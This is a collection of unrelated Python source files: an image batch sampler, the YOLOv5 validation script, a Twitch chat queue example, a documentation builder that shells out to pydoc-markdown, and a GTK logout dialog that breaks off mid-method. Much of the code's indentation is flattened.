from dataProcessor.miningTypes import MiningTypes
from multiprocessing import Process, Queue
class MagNetBatchSampler():
def __init__(self, batch_size, image_sampler, net=None, distance=None, mining=[], random_mining_iterations=5, ctx=mx.cpu(), channels=3):
self.batch_size = batch_size
self.image_sampler = image_sampler
self.ctx = ctx
self.net = net
self.distance = distance
self.mining = mining
self.random_mining_iterations = random_mining_iterations
self.channels = channels
self.batches = Queue()
for worker in range(0,8):
            fillDaemon = Process(target=self.fillDaemon, args=(self.batches,))
            fillDaemon.daemon = True
            fillDaemon.start()
    def fillDaemon(self, queue):
while True:
while queue.qsize() < 32:
self.fill(queue)
time.sleep(1)
def fill(self, queue):
queue.put(self.prepareBatch())
def take(self):
return self.batches.get()
def getBatch(self, validation=False, file=None):
if self.batches.qsize() > 0:
return self.take()
else:
time.sleep(1)
return self.getBatch(validation=validation, file=file)
def prepareBatch(self, validation=False, train=False):
batch_cluster = []
coord_cluster = []
px_coord_cluster = []
valid_cluster = []
for iteration in range(0, 12):
pred_batches = np.zeros((self.batch_size, self.channels, self.image_sampler.size, self.image_sampler.size))
pred_coords = np.zeros((self.batch_size, 2))
pred_px_coords = np.zeros((self.batch_size, 2))
pred_valid_batches = np.zeros((self.batch_size, self.channels, self.image_sampler.size, self.image_sampler.size))
images, valids = self.image_sampler.get_cluster_by_px(self.batch_size)
prep_imgs = ImageProcessor.prepare_Images(images, ctx=self.ctx, bgr=False)
prep_valid_imgs = ImageProcessor.prepare_Images(valids, size=self.image_sampler.size, ctx=self.ctx, bgr=True, validation=True)
for batch in range(0, len(images)):
pred_batches[batch] = prep_imgs[batch]
pred_valid_batches[batch] = prep_valid_imgs[batch]
batch_cluster.append(pred_batches)
coord_cluster.append(pred_coords)
px_coord_cluster.append(pred_px_coords)
valid_cluster.append(pred_valid_batches)
#print("reset")
self.reset()
return (batch_cluster, coord_cluster, px_coord_cluster, valid_cluster)
def reset(self):
self.image_sampler.reset()
def unitTest(batches=8, img_size=256):
def mean(img):
return img.mean(axis=(0,1), exclude=True)
def l2_distance(a, b):
return nd.sqrt(nd.square(a-b).sum(axis=0, exclude=True))
sampler = ImageSampler(img_size/8, img_size/2, img_size*10, img_size*100, img_size)
    batch_sampler = MagNetBatchSampler(batches, sampler, net=mean, distance=l2_distance, mining=[MiningTypes.RANDOM_HARD_NEGATIVE, MiningTypes.RANDOM_HARD_POSITIVE])
    images, coords, px_coords, valid = batch_sampler.getBatch()
return images, coords, px_coords, valid
if __name__ == '__main__':
unitTest()
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.common import DetectMultiBackend
from utils.callbacks import Callbacks
from utils.datasets import create_dataloader
from utils.general import (LOGGER, NCOLS, box_iou, check_dataset, check_img_size, check_requirements, check_yaml,
coco80_to_coco91_class, colorstr, increment_path, non_max_suppression, print_args,
scale_coords, xywh2xyxy, xyxy2xywh)
from utils.metrics import ConfusionMatrix, ap_per_class
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
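# Note: correct[i, j] is True when detection i overlaps a same-class label with
# IoU >= iouv[j]; duplicate label/detection pairings are dropped, keeping the
# highest-IoU match for each detection and each label.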
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project=ROOT / 'runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device, pt = next(model.parameters()).device, True # get model device, PyTorch model
half &= device.type != 'cpu' # half precision only supported on CUDA
model.half() if half else model.float()
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = DetectMultiBackend(weights, device=device, dnn=dnn)
stride, pt = model.stride, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
half &= pt and device.type != 'cpu' # half precision only supported by PyTorch on CUDA
if pt:
model.model.half() if half else model.model.float()
else:
half = False
batch_size = 1 # export.py models default to batch-size 1
device = torch.device('cpu')
LOGGER.info(f'Forcing --batch-size 1 square inference shape(1,3,{imgsz},{imgsz}) for non-PyTorch backends')
# Data
data = check_dataset(data) # check
# Configure
model.eval()
is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if pt and device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.model.parameters()))) # warmup
pad = 0.0 if task == 'speed' else 0.5
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, stride, single_cls, pad=pad, rect=pt,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
pbar = tqdm(dataloader, desc=s, ncols=NCOLS, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}') # progress bar
for batch_i, (im, targets, paths, shapes) in enumerate(pbar):
t1 = time_sync()
if pt:
im = im.to(device, non_blocking=True)
targets = targets.to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
nb, _, height, width = im.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Inference
out, train_out = model(im) if training else model(im, augment=augment, val=True) # inference, loss outputs
dt[1] += time_sync() - t2
# Loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t3 = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
dt[2] += time_sync() - t3
# Metrics
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(im[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(im[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.run('on_val_image_end', pred, predn, path, names, im[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(im, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(im, output_to_target(out), paths, f, names), daemon=True).start()
# Compute metrics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
LOGGER.info(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
LOGGER.info(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
LOGGER.info(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
LOGGER.info(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default=ROOT / 'runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.data = check_yaml(opt.data) # check YAML
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
print_args(FILE.stem, opt)
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
if opt.conf_thres > 0.001: # https://github.com/ultralytics/yolov5/issues/1466
LOGGER.info(f'WARNING: confidence threshold {opt.conf_thres} >> 0.001 will produce invalid mAP values.')
run(**vars(opt))
else:
weights = opt.weights if isinstance(opt.weights, list) else [opt.weights]
opt.half = True # FP16 for fastest results
if opt.task == 'speed': # speed benchmarks
# python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
opt.conf_thres, opt.iou_thres, opt.save_json = 0.25, 0.45, False
for opt.weights in weights:
run(**vars(opt), plots=False)
elif opt.task == 'study': # speed vs mAP benchmarks
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
for opt.weights in weights:
f = f'study_{Path(opt.data).stem}_{Path(opt.weights).stem}.txt' # filename to save to
x, y = list(range(256, 1536 + 128, 128)), [] # x axis (image sizes), y axis
for opt.imgsz in x: # img-size
LOGGER.info(f'\nRunning {f} --imgsz {opt.imgsz}...')
r, _, t = run(**vars(opt), plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_val_study(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
chat_queue.py
|
import threading
import queue  # on Python 2 this module is named Queue
import pytwitcherapi
session = ... # we assume an authenticated TwitchSession
channel = session.get_channel('somechannel')
client = pytwitcherapi.IRCClient(session, channel, queuesize=0)
t = threading.Thread(target=client.process_forever)
t.start()
try:
while True:
try:
m = client.messages.get(block=False)
except queue.Empty:
pass
else:
# Now you have the message in the main thread
# and can display the message in the
# GUI or wherever you want
print "Message from %s to %s: %s" % (m.source, m.target, m.text)
finally:
client.shutdown()
t.join()
|
build_docs.py
|
import glob
import os
import shutil
from pathlib import Path
from subprocess import check_output
from threading import Thread
from typing import Dict, Union, Optional, Set, List, Sequence, Mapping
from git import Git
from ruamel.yaml import YAML # type: ignore
from constants import ABS_PATH_OF_TOP_LEVEL_DIR
from scripts.literate import literate_python_to_markdown
class StringColors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
exclude_files = [
".DS_Store",
"__init__.py",
"__init__.pyc",
"README.md",
"version.py",
"run.py",
"setup.py",
"main.py",
]
def render_file(
relative_src_path: str, src_file: str, to_file: str, modifier=""
) -> None:
"""Shells out to pydocmd, which creates a .md file from the docstrings of
python functions and classes in the file we specify.
The modifer specifies the depth at which to generate docs for
classes and functions in the file. More information here:
https://pypi.org/project/pydoc-markdown/
"""
# First try literate
was_literate = False
try:
was_literate = literate_python_to_markdown(
path=os.path.join(relative_src_path, src_file)
)
except Exception as _:
pass
if was_literate:
return
# Now do standard pydocmd
relative_src_namespace = relative_src_path.replace("/", ".")
src_base = src_file.replace(".py", "")
if relative_src_namespace == "":
namespace = f"{src_base}{modifier}"
else:
namespace = f"{relative_src_namespace}.{src_base}{modifier}"
pydoc_config = """'{
renderer: {
type: markdown,
code_headers: true,
descriptive_class_title: false,
add_method_class_prefix: true,
source_linker: {type: github, repo: allenai/allenact},
header_level_by_type: {
Module: 1,
Class: 2,
Method: 3,
Function: 3,
Data: 3,
}
}
}'"""
pydoc_config = " ".join(pydoc_config.split())
args = ["pydoc-markdown", "-m", namespace, pydoc_config]
try:
call_result = check_output([" ".join(args)], shell=True, env=os.environ).decode(
"utf-8"
)
# noinspection PyShadowingNames
with open(to_file, "w") as f:
doc_split = call_result.split("\n")
# github_path = "https://github.com/allenai/allenact/tree/master/"
# path = (
# github_path + namespace.replace(".", "/") + ".py"
# )
# mdlink = "[[source]]({})".format(path)
mdlink = "" # Removing the above source link for now.
call_result = "\n".join([doc_split[0] + " " + mdlink] + doc_split[1:])
f.write(call_result)
print(
f"{StringColors.OKGREEN}[SUCCESS]{StringColors.ENDC} built docs for {src_file} -> {to_file}."
)
except Exception as _:
cmd = " ".join(args)
print(
f"{StringColors.WARNING}[SKIPPING]{StringColors.ENDC} could not"
f" build docs for {src_file} (missing an import?). CMD: '{cmd}'"
)
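# For reference, a call such as render_file("utils", "misc.py", "docs/api/utils/misc.md")
# (hypothetical paths) ends up running roughly:
#   pydoc-markdown -m utils.misc '{ renderer: { type: markdown, ... } }'
# and writes the captured markdown output to the target file.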
# noinspection PyShadowingNames
def build_docs_for_file(
relative_path: str, file_name: str, docs_dir: str, threads: List
) -> Dict[str, str]:
"""Build docs for an individual python file."""
clean_filename = file_name.replace(".py", "")
markdown_filename = f"{clean_filename}.md"
output_path = os.path.join(docs_dir, relative_path, markdown_filename)
nav_path = os.path.join("api", relative_path, markdown_filename)
thread = Thread(target=render_file, args=(relative_path, file_name, output_path))
thread.start()
threads.append(thread)
return {os.path.basename(clean_filename): nav_path}
# noinspection PyShadowingNames
def build_docs(
base_dir: Union[Path, str],
root_path: Union[Path, str],
docs_dir: Union[Path, str],
threads: List,
allowed_dirs: Optional[Set[str]] = None,
):
base_dir, root_path, docs_dir = str(base_dir), str(root_path), str(docs_dir)
nav_root = []
for child in os.listdir(root_path):
relative_path = os.path.join(root_path, child)
if (
(allowed_dirs is not None)
and (os.path.isdir(relative_path))
and (os.path.abspath(relative_path) not in allowed_dirs)
# or ".git" in relative_path
# or ".idea" in relative_path
# or "__pycache__" in relative_path
# or "tests" in relative_path
# or "mypy_cache" in relative_path
):
print("SKIPPING {}".format(relative_path))
continue
# without_allenact = str(root_path).replace("allenact/", "")
new_path = os.path.relpath(root_path, base_dir).replace(".", "")
target_dir = os.path.join(docs_dir, new_path)
if not os.path.exists(target_dir):
os.mkdir(target_dir)
if os.path.isdir(relative_path):
nav_subsection = build_docs(
base_dir,
relative_path,
docs_dir,
threads=threads,
allowed_dirs=allowed_dirs,
)
if not nav_subsection:
continue
nav_root.append({child: nav_subsection})
else:
if child in exclude_files or not child.endswith(".py"):
continue
nav = build_docs_for_file(new_path, child, docs_dir, threads=threads)
nav_root.append(nav)
return nav_root
def project_readme_paths_to_nav_structure(project_readmes):
nested_dict = {}
for fp in project_readmes:
has_seen_project_dir = False
sub_nested_dict = nested_dict
split_fp = os.path.dirname(fp).split("/")
for i, yar in enumerate(split_fp):
has_seen_project_dir = has_seen_project_dir or yar == "projects"
if not has_seen_project_dir or yar == "projects":
continue
if yar not in sub_nested_dict:
if i == len(split_fp) - 1:
sub_nested_dict[yar] = fp.replace("docs/", "")
break
else:
sub_nested_dict[yar] = {}
sub_nested_dict = sub_nested_dict[yar]
def recursively_create_nav_structure(nested_dict):
if isinstance(nested_dict, str):
return nested_dict
to_return = []
for key in nested_dict:
to_return.append({key: recursively_create_nav_structure(nested_dict[key])})
return to_return
return recursively_create_nav_structure(nested_dict)
def pruned_nav_entries(nav_entries):
if isinstance(nav_entries, str):
if os.path.exists(os.path.join("docs", nav_entries)):
return nav_entries
else:
return None
elif isinstance(nav_entries, Sequence):
new_entries = []
for entry in nav_entries:
entry = pruned_nav_entries(entry)
if entry:
new_entries.append(entry)
return new_entries
elif isinstance(nav_entries, Mapping):
new_entries = {}
for k, entry in nav_entries.items():
entry = pruned_nav_entries(entry)
if entry:
new_entries[k] = entry
return new_entries
else:
raise NotImplementedError()
def main():
os.chdir(ABS_PATH_OF_TOP_LEVEL_DIR)
print("Copying all README.md files to docs.")
with open("README.md") as f:
readme_content = f.readlines()
readme_content = [x.replace("docs/", "") for x in readme_content]
with open("docs/index.md", "w") as f:
f.writelines(readme_content)
project_readmes = []
for readme_file_path in glob.glob("projects/**/README.md", recursive=True):
if "docs/" not in readme_file_path:
new_path = os.path.join("docs", readme_file_path)
os.makedirs(os.path.dirname(new_path), exist_ok=True)
shutil.copy(readme_file_path, new_path)
project_readmes.append(new_path)
print("Copying LICENSE file to docs.")
shutil.copy("LICENSE", "docs/LICENSE.md")
print("Copying CONTRIBUTING.md file to docs.")
shutil.copy("CONTRIBUTING.md", "docs/CONTRIBUTING.md")
# print("Copying CNAME file to docs.")
# shutil.copy("CNAME", "docs/CNAME")
print("Building the docs.")
parent_folder_path = Path(__file__).parent.parent
yaml_path = parent_folder_path / "mkdocs.yml"
source_path = parent_folder_path
docs_dir = str(parent_folder_path / "docs" / "api")
if not os.path.exists(docs_dir):
os.mkdir(docs_dir)
# Adding project readmes to the yaml
yaml = YAML()
mkdocs_yaml = yaml.load(yaml_path)
site_nav = mkdocs_yaml["nav"]
# TODO Find a way to do the following in a way that results in nice titles.
# projects_key = "Projects using allenact"
# nav_obj = None
# for obj in site_nav:
# if projects_key in obj:
# nav_obj = obj
# break
# nav_obj[projects_key] = project_readme_paths_to_nav_structure(project_readmes)
with open(yaml_path, "w") as f:
yaml.dump(mkdocs_yaml, f)
# Get directories to ignore
git_dirs = set(
os.path.abspath(os.path.split(p)[0]) for p in Git(".").ls_files().split("\n")
)
ignore_rel_dirs = [
"docs",
"scripts",
"experiments",
"src",
".pip_src",
"dist",
"build",
]
ignore_abs_dirs = set(
os.path.abspath(os.path.join(str(parent_folder_path), rel_dir))
for rel_dir in ignore_rel_dirs
)
for d in ignore_abs_dirs:
if d in git_dirs:
git_dirs.remove(d)
threads: List = []
nav_entries = build_docs(
parent_folder_path,
source_path,
docs_dir,
threads=threads,
allowed_dirs=git_dirs,
)
nav_entries.sort(key=lambda x: list(x)[0], reverse=False)
for thread in threads:
thread.join()
nav_entries = pruned_nav_entries(nav_entries)
docs_key = "API"
# Find the yaml corresponding to the API
nav_obj = None
for obj in site_nav:
if docs_key in obj:
nav_obj = obj
break
nav_obj[docs_key] = nav_entries
with open(yaml_path, "w") as f:
yaml.dump(mkdocs_yaml, f)
if __name__ == "__main__":
main()
|
lcarsde-logout.py
|
#!/usr/bin/env python3
import gi
import psutil
import os
import subprocess
from multiprocessing import Process
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, Gio, GLib
css = b'''
.button {
min-height: 38px;
font-family: 'Ubuntu Condensed', sans-serif;
font-weight: 600;
font-size: 18px;
color: #000;
text-shadow: none;
outline-style: none;
border-radius: 25px;
border-width: 0;
box-shadow: none;
padding: 2px 20px;
margin: 0;
}
.button--c9c {
background-color: #c9c;
background: #c9c; /* for Ubuntu */
}
.button--99c {
background-color: #99c;
background: #99c; /* for Ubuntu */
}
.button--c66 {
background-color: #c66;
background: #c66; /* for Ubuntu */
}
.button--f96 {
background-color: #f96;
background: #f96; /* for Ubuntu */
}
.category {
font-family: 'Ubuntu Condensed', sans-serif;
font-weight: 600;
font-size: 24px;
color: #f90;
}
.line-end {
min-width: 20px;
background-color: #99F;
background: #99F; /* for Ubuntu */
outline-style: none;
border-width: 0;
box-shadow: none;
padding: 0;
margin: 0;
}
.line-end--left {
border-radius: 20px 0 0 20px;
}
.line-end--right {
border-radius: 0 20px 20px 0;
}
.window {
background-color: #000;
}
'''
class LcarsdeLogout(Gtk.Window):
"""
lcarsde logout main window
"""
def __init__(self):
Gtk.Window.__init__(self, title="Logout")
self.css_provider = Gtk.CssProvider()
self.css_provider.load_from_data(css)
self.scroll_container = Gtk.ScrolledWindow()
self.scroll_container.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
self.app_container = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=8)
self.setup_buttons()
self.scroll_container.add(self.app_container)
self.add(self.scroll_container)
self.connect('size-allocate', self.view_changed)
self.get_style_context().add_class("window")
self.get_style_context().add_provider(self.css_provider, Gtk.STYLE_PROVIDER_PRIORITY_USER)
def view_changed(self, widget, event, data=None):
adj = self.scroll_container.get_vadjustment()
adj.set_value(0)
def setup_buttons(self):
handler = LcarsdeLogout.get_handler("Stop", "PowerOff")
if handler is not None:
self.create_button("Shutdown", handler, "c66")
handler = LcarsdeLogout.get_handler("Restart", "Reboot")
if handler is not None:
self.create_button("Reboot", handler, "f96")
handler = LcarsdeLogout.get_handler("Suspend", "Suspend")
if handler is not None:
self.create_button("Suspend", handler, "c9c")
handler = LcarsdeLogout.get_handler("Hibernate", "Hibernate")
if handler is not None:
self.create_button("Hibernate", handler, "c9c")
if LcarsdeLogout.is_lock_screen_available():
self.create_button("Lock Screen", LcarsdeLogout.lock_screen, "99c")
self.create_button("Logout", LcarsdeLogout.logout, "f96")
def create_button(self, label, handler, color):
button = Gtk.Button(label=label)
button.connect("clicked", lambda w: handler())
button.set_alignment(1, 1)
button.get_style_context().add_class("button")
button.get_style_context().add_class("button--{}".format(color))
button.get_style_context().add_provider(self.css_provider, Gtk.STYLE_PROVIDER_PRIORITY_USER)
self.app_container.add(button)
@staticmethod
def get_proxy(name, object_path, interface_name):
bus = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)
return Gio.DBusProxy.new_sync(bus, Gio.DBusProxyFlags.NONE, None, name, object_path, interface_name, None)
@staticmethod
def is_method_available(proxy, method_name):
try:
result = proxy.call_sync(method_name, None, Gio.DBusCallFlags.NONE, 100, None)
except GLib.GError:
return False
return result[0] == 'yes'
@staticmethod
def is_console_kit_method_available(method_name):
"""
:param method_name: Stop or Restart
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.ConsoleKit', '/org/freedesktop/ConsoleKit/Manager',
'org.freedesktop.ConsoleKit.Manager')
return LcarsdeLogout.is_method_available(proxy, method_name)
@staticmethod
def run_console_kit_method(method_name):
"""
:param method_name: Stop or Restart
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.ConsoleKit', '/org/freedesktop/ConsoleKit/Manager',
'org.freedesktop.ConsoleKit.Manager')
proxy.call_sync(method_name, None, Gio.DBusCallFlags.NONE, 100, None)
@staticmethod
def is_systemd_method_available(method_name):
"""
:param method_name: PowerOff, Reboot, Suspend or Hibernate
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.login1', '/org/freedesktop/login1',
'org.freedesktop.login1.Manager')
return LcarsdeLogout.is_method_available(proxy, method_name)
@staticmethod
def run_systemd_method(method_name):
"""
:param method_name: PowerOff, Reboot, Suspend or Hibernate
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.login1', '/org/freedesktop/login1',
'org.freedesktop.login1.Manager')
parameter = GLib.Variant.new_tuple(GLib.Variant.new_boolean(True))
